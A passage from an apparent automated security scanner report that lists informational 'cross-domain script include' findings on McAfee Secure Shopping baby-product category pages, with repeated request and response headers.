Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:30 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:30 GMT
Content-Length: 54462

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Nursing Apparel at McAfee Secure Shopping - Search, Discover &am
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.57. http://secureshopping.mcafee.com/browse/baby/feeding/nursing-bras/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/nursing-bras/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/feeding/nursing-bras/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:30 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:30 GMT
Content-Length: 69056

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Nursing Bras at McAfee Secure Shopping - Search, Discover &
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.58. http://secureshopping.mcafee.com/browse/baby/feeding/nursing-pads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/nursing-pads/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/feeding/nursing-pads/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:31 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:31 GMT
Content-Length: 54300

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Nursing Pads at McAfee Secure Shopping - Search, Discover &
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.59. http://secureshopping.mcafee.com/browse/baby/feeding/nursing-pillows/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/nursing-pillows/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/feeding/nursing-pillows/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:31 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:31 GMT
Content-Length: 64123

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Nursing Pillows at McAfee Secure Shopping - Search, Discover &am
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.60. http://secureshopping.mcafee.com/browse/baby/feeding/spoons-forks/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/spoons-forks/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/feeding/spoons-forks/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:33 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:33 GMT
Content-Length: 61905

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Spoons & Forks at McAfee Secure Shopping - Search, Discover
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.61. http://secureshopping.mcafee.com/browse/baby/furniture/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/furniture/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:21 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:51:21 GMT
Content-Length: 65773

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Furniture at McAfee Secure Shopping - Search, Discover & Com
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.62. http://secureshopping.mcafee.com/browse/baby/furniture/bassinets/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/bassinets/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/furniture/bassinets/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:22 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:51:22 GMT
Content-Length: 59002

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Bassinets at McAfee Secure Shopping - Search, Discover & Com
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.63. http://secureshopping.mcafee.com/browse/baby/furniture/changing-tables/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/changing-tables/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/furniture/changing-tables/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:24 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:51:24 GMT
Content-Length: 54569

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Changing Tables at McAfee Secure Shopping - Search, Discover &am
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.64. http://secureshopping.mcafee.com/browse/baby/furniture/cribs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/cribs/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/furniture/cribs/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:25 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:51:25 GMT
Content-Length: 61275

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Cribs at McAfee Secure Shopping - Search, Discover & Compare
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.65. http://secureshopping.mcafee.com/browse/baby/furniture/dressers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/dressers/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/furniture/dressers/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:28 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:51:28 GMT
Content-Length: 59895

